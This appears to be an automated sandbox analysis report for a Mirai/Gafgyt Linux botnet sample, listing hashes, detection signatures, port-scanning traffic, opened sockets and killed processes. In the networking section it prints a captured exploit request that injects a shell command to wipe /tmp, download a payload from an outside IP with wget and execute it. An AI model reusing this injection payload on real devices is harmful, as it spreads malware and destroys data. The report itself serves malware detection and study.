Linux Analysis Report nSg5RM0w0d

Overview

General Information

Sample Name: nSg5RM0w0d
Analysis ID: 553468
MD5: 5ba84075b6789440e97cb6095ad55c32
SHA1: 19c16b64b5482561db39de26034459274b9dfb91
SHA256: 65222b0aa3c9aa64a92d8c4aa20e664ff6a7049c8b70dac73d85794407a32ded
Tags: 32, elf, mirai, motorola

Detection

Gafgyt Mirai
Score: 100
Range: 0 - 100
Whitelisted: false

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Mirai
Multi AV Scanner detection for submitted file
Yara detected Gafgyt
Connects to many ports of the same IP (likely port scanning)
Reads system files that contain records of logged in users
Uses known network protocols on non-standard ports
Sample tries to kill multiple processes (SIGKILL)
Sample reads /proc/mounts (often used for finding a writable filesystem)
Executes the "kill" or "pkill" command typically used to terminate processes
Reads CPU information from /sys indicative of miner or evasive malware
Yara signature match
Executes the "grep" command used to find patterns in files or piped streams
Reads system information from the proc file system
Uses the "uname" system call to query kernel version information (possible evasion)
Enumerates processes within the "proc" file system
Executes the "systemctl" command used for controlling the systemd system and service manager
Detected TCP or UDP traffic on non-standard ports
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Deletes log files
Creates hidden files and/or directories
Sample has stripped symbol table
Sample tries to set the executable flag
Executes commands using a shell command-line interpreter

Classification

AV Detection:

Multi AV Scanner detection for submitted file
Source: nSg5RM0w0d ReversingLabs: Detection: 55%

Bitcoin Miner:

Reads CPU information from /sys indicative of miner or evasive malware
Source: /usr/bin/pulseaudio (PID: 5386) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 5492) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 5661) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 5842) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pulseaudio (PID: 5948) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6019) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pulseaudio (PID: 6041) Reads CPU info from /sys: /sys/devices/system/cpu/online

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Connects to many ports of the same IP (likely port scanning)
Source: global traffic TCP traffic: 104.244.72.234 ports 64938,3,4,6,8,9
Uses known network protocols on non-standard ports
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 147.102.109.1:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 119.79.96.251:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 183.119.87.6:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 18.133.50.2:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 211.27.50.27:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 206.44.2.31:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 93.196.141.233:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 9.74.161.245:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 58.29.115.97:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 211.7.34.142:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 203.237.132.77:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 204.232.204.174:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 25.182.187.147:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 114.118.205.35:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 157.187.153.25:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 125.173.44.85:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 196.176.87.55:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 178.174.72.248:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 35.16.219.251:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 4.2.179.168:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 156.187.181.112:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 42.198.181.24:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 113.215.220.35:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 151.38.181.210:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 153.179.86.207:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 213.86.40.169:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 133.176.234.213:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 187.115.63.64:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 72.108.74.42:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 198.17.154.26:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 160.143.92.117:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 135.134.159.239:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 190.223.45.85:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 165.188.62.44:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 218.89.81.80:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 204.241.148.137:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 47.45.127.237:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 208.71.119.163:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 222.198.41.31:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 2.74.251.130:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 182.121.193.108:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 126.205.223.163:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 72.251.254.132:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 174.26.79.34:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 173.156.81.81:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 79.203.29.39:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 84.94.29.146:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 104.101.116.202:60001
Source: global traffic TCP traffic: 192.168.2.23:34070 -> 123.195.104.58:2323
Source: global traffic TCP traffic: 192.168.2.23:34070 -> 17.70.7.83:2323
Source: global traffic TCP traffic: 192.168.2.23:34070 -> 74.28.100.202:2323
Source: global traffic TCP traffic: 192.168.2.23:34070 -> 143.32.92.250:2323
Source: global traffic TCP traffic: 192.168.2.23:34070 -> 52.79.231.71:2323
Source: global traffic TCP traffic: 192.168.2.23:34070 -> 57.112.70.8:2323
Source: global traffic TCP traffic: 192.168.2.23:34070 -> 130.133.22.58:2323
Source: global traffic TCP traffic: 192.168.2.23:34070 -> 169.109.118.134:2323
Source: global traffic TCP traffic: 192.168.2.23:34070 -> 88.208.187.157:2323
Source: global traffic TCP traffic: 192.168.2.23:34070 -> 14.116.233.190:2323
Source: global traffic TCP traffic: 192.168.2.23:34070 -> 4.43.172.83:2323
Source: global traffic TCP traffic: 192.168.2.23:34070 -> 194.65.212.156:2323
Source: global traffic TCP traffic: 192.168.2.23:34070 -> 70.138.187.241:2323
Source: global traffic TCP traffic: 192.168.2.23:34070 -> 113.195.150.196:2323
Source: global traffic TCP traffic: 192.168.2.23:34070 -> 95.121.124.186:2323
Source: global traffic TCP traffic: 192.168.2.23:34070 -> 61.70.250.122:2323
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 86.170.53.107:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 180.248.8.21:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 203.176.45.183:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 122.53.132.229:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 209.49.84.150:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 92.124.60.252:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 115.52.224.139:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 60.60.41.162:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 106.172.163.198:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 65.70.167.105:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 111.130.207.205:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 119.40.96.250:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 151.163.216.8:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 94.253.181.187:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 182.98.239.168:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 58.52.166.56:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 59.41.45.224:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 158.248.3.160:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 75.166.85.52:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 90.254.115.12:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 119.163.10.116:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 209.39.54.122:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 126.60.156.32:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 57.3.199.170:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 202.27.213.221:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 167.48.227.88:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 71.108.144.56:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 108.246.72.74:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 96.107.67.21:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 9.194.50.89:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 137.131.254.22:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 170.84.178.138:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 218.196.123.217:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 95.251.244.138:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 165.114.253.69:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 112.110.89.1:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 158.144.97.195:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 20.233.19.143:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 39.96.229.246:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 189.62.185.2:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 91.18.210.18:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 143.224.144.238:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 120.118.140.160:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 46.115.13.57:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 164.100.7.174:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 211.118.223.21:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 194.233.198.53:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 91.31.148.129:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 8.206.72.175:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 78.155.239.80:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 219.48.10.203:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 27.36.153.232:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 219.95.150.109:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 71.207.211.178:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 200.79.203.81:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 144.162.252.79:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 134.222.246.62:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 49.175.189.148:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 14.30.8.111:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 111.28.52.251:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 136.54.43.15:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 103.53.140.247:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 156.32.93.100:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 24.213.41.172:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 68.180.48.89:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 144.6.62.203:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 106.228.61.53:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 43.94.30.9:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 175.123.136.220:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 132.105.230.84:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 156.97.162.227:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 198.246.56.154:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 94.109.254.153:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 205.72.188.118:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 34.35.107.74:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 144.240.166.255:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 9.5.44.26:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 151.104.251.71:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 157.52.206.247:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 174.128.114.172:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 176.170.117.222:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 74.106.139.170:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 196.218.185.224:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 95.208.37.103:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 96.251.12.179:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 100.220.218.129:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 199.165.29.174:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 73.93.35.181:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 113.19.170.148:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 72.158.157.189:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 8.52.48.115:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 76.223.160.142:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 106.102.194.215:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 177.67.210.86:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 135.158.98.166:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 103.243.238.227:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 100.19.40.185:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 208.56.103.32:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 18.60.171.58:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 67.248.227.249:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 145.119.255.221:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 45.96.87.65:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 151.19.3.35:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 199.28.233.40:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 179.14.62.240:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 199.249.182.114:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 113.107.190.227:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 91.57.152.78:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 213.138.71.78:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 104.209.49.71:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 158.130.165.4:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 199.211.97.174:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 9.135.204.92:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 183.176.237.106:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 152.85.169.140:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 93.111.23.245:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 68.130.7.111:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 84.221.11.27:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 76.193.216.208:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 124.161.2.224:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 119.14.122.138:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 111.229.51.1:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 170.193.179.129:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 101.67.125.12:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 42.94.135.210:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 75.125.83.78:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 35.223.195.176:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 142.56.78.51:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 135.126.160.81:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 126.8.163.150:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 209.12.45.210:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 161.34.154.74:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 31.37.0.236:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 147.238.255.245:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 76.0.57.93:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 204.177.192.168:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 130.47.86.189:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 102.27.2.73:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 79.67.203.76:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 167.249.114.193:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 114.249.23.159:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 155.201.9.57:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 156.199.156.88:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 45.84.57.112:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 50.31.32.115:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 8.213.164.127:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 171.119.172.241:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 207.65.211.154:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 195.94.123.208:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 197.168.205.146:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 183.48.73.4:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 32.200.201.84:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 5.10.122.234:60001
Sample listens on a socket
Source: /tmp/nSg5RM0w0d (PID: 5278) Socket: 127.0.0.1::43829
Source: /tmp/nSg5RM0w0d (PID: 5280) Socket: 0.0.0.0::0
Source: /tmp/nSg5RM0w0d (PID: 5280) Socket: 0.0.0.0::8000
Source: /tmp/nSg5RM0w0d (PID: 5280) Socket: 0.0.0.0::9000
Source: /tmp/nSg5RM0w0d (PID: 5280) Socket: 0.0.0.0::8080
Source: /tmp/nSg5RM0w0d (PID: 5280) Socket: 0.0.0.0::8081
Source: /tmp/nSg5RM0w0d (PID: 5280) Socket: 0.0.0.0::53413
Source: /tmp/nSg5RM0w0d (PID: 5280) Socket: 0.0.0.0::52869
Source: /tmp/nSg5RM0w0d (PID: 5280) Socket: 0.0.0.0::37215
Source: /tmp/nSg5RM0w0d (PID: 5280) Socket: 0.0.0.0::81
Source: /tmp/nSg5RM0w0d (PID: 5280) Socket: 0.0.0.0::8089
Source: /tmp/nSg5RM0w0d (PID: 5280) Socket: 0.0.0.0::8088
Source: /tmp/nSg5RM0w0d (PID: 5280) Socket: 0.0.0.0::8083
Source: /tmp/nSg5RM0w0d (PID: 5280) Socket: 0.0.0.0::443
Source: /tmp/nSg5RM0w0d (PID: 5280) Socket: 0.0.0.0::4444
Source: /tmp/nSg5RM0w0d (PID: 5280) Socket: 0.0.0.0::8001
Source: /tmp/nSg5RM0w0d (PID: 5280) Socket: 0.0.0.0::49152
Source: /tmp/nSg5RM0w0d (PID: 5280) Socket: 0.0.0.0::40960
Source: /tmp/nSg5RM0w0d (PID: 5280) Socket: 0.0.0.0::1024
Source: /tmp/nSg5RM0w0d (PID: 5280) Socket: 0.0.0.0::1337
Source: /tmp/nSg5RM0w0d (PID: 5280) Socket: 0.0.0.0::420
Source: /tmp/nSg5RM0w0d (PID: 5286) Socket: 0.0.0.0::23
Source: /tmp/nSg5RM0w0d (PID: 5286) Socket: 0.0.0.0::0
Source: /tmp/nSg5RM0w0d (PID: 5286) Socket: 0.0.0.0::80
Source: /tmp/nSg5RM0w0d (PID: 5286) Socket: 0.0.0.0::60001
Source: /tmp/nSg5RM0w0d (PID: 5286) Socket: 0.0.0.0::8000
Source: /tmp/nSg5RM0w0d (PID: 5286) Socket: 0.0.0.0::9000
Source: /tmp/nSg5RM0w0d (PID: 5286) Socket: 0.0.0.0::8080
Source: /tmp/nSg5RM0w0d (PID: 5286) Socket: 0.0.0.0::8081
Source: /tmp/nSg5RM0w0d (PID: 5286) Socket: 0.0.0.0::53413
Source: /tmp/nSg5RM0w0d (PID: 5286) Socket: 0.0.0.0::52869
Source: /tmp/nSg5RM0w0d (PID: 5286) Socket: 0.0.0.0::37215
Source: /tmp/nSg5RM0w0d (PID: 5286) Socket: 0.0.0.0::81
Source: /tmp/nSg5RM0w0d (PID: 5286) Socket: 0.0.0.0::8089
Source: /tmp/nSg5RM0w0d (PID: 5286) Socket: 0.0.0.0::8088
Source: /tmp/nSg5RM0w0d (PID: 5286) Socket: 0.0.0.0::8083
Source: /tmp/nSg5RM0w0d (PID: 5286) Socket: 0.0.0.0::443
Source: /tmp/nSg5RM0w0d (PID: 5286) Socket: 0.0.0.0::4444
Source: /tmp/nSg5RM0w0d (PID: 5286) Socket: 0.0.0.0::8001
Source: /tmp/nSg5RM0w0d (PID: 5286) Socket: 0.0.0.0::49152
Source: /tmp/nSg5RM0w0d (PID: 5286) Socket: 0.0.0.0::40960
Source: /tmp/nSg5RM0w0d (PID: 5286) Socket: 0.0.0.0::1024
Source: /tmp/nSg5RM0w0d (PID: 5286) Socket: 0.0.0.0::1337
Source: /tmp/nSg5RM0w0d (PID: 5286) Socket: 0.0.0.0::420
Source: /lib/systemd/systemd-journald (PID: 5321) Socket: <unknown socket type>:unknown
Source: /usr/sbin/gdm3 (PID: 5498) Socket: <unknown socket type>:unknown
Source: /usr/bin/dbus-daemon (PID: 5527) Socket: <unknown socket type>:unknown
Source: /lib/systemd/systemd-journald (PID: 5566) Socket: <unknown socket type>:unknown
Source: /lib/systemd/systemd-journald (PID: 5668) Socket: <unknown socket type>:unknown
Source: /lib/systemd/systemd-journald (PID: 5746) Socket: <unknown socket type>:unknown
Source: /lib/systemd/systemd-journald (PID: 5850) Socket: <unknown socket type>:unknown
Source: /lib/systemd/systemd-journald (PID: 5925) Socket: <unknown socket type>:unknown
Source: /lib/systemd/systemd-journald (PID: 6033) Socket: <unknown socket type>:unknown
Source: syslog.284.dr String found in binary or memory: https://www.rsyslog.com
Source: unknown DNS traffic detected: queries for: daisy.ubuntu.com
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: unknown HTTPS traffic detected: 162.213.33.132:443 -> 192.168.2.23:35442 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.213.33.108:443 -> 192.168.2.23:36684 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.213.33.108:443 -> 192.168.2.23:36688 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.213.33.108:443 -> 192.168.2.23:36690 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.213.33.108:443 -> 192.168.2.23:36692 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.213.33.108:443 -> 192.168.2.23:36694 version: TLS 1.2

System Summary:

Sample tries to kill multiple processes (SIGKILL)
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 936, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5286, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 491, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 658, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 720, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 721, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 759, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 761, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 772, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 774, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 777, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 785, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 793, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 1334, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 1335, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 1344, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 1872, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 1886, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 2048, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5041, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5179, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5180, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5282, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5290, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5294, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5321, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5372, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5386, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5459, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5461, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5566, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5567, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5571, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5575, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5653, result: successful
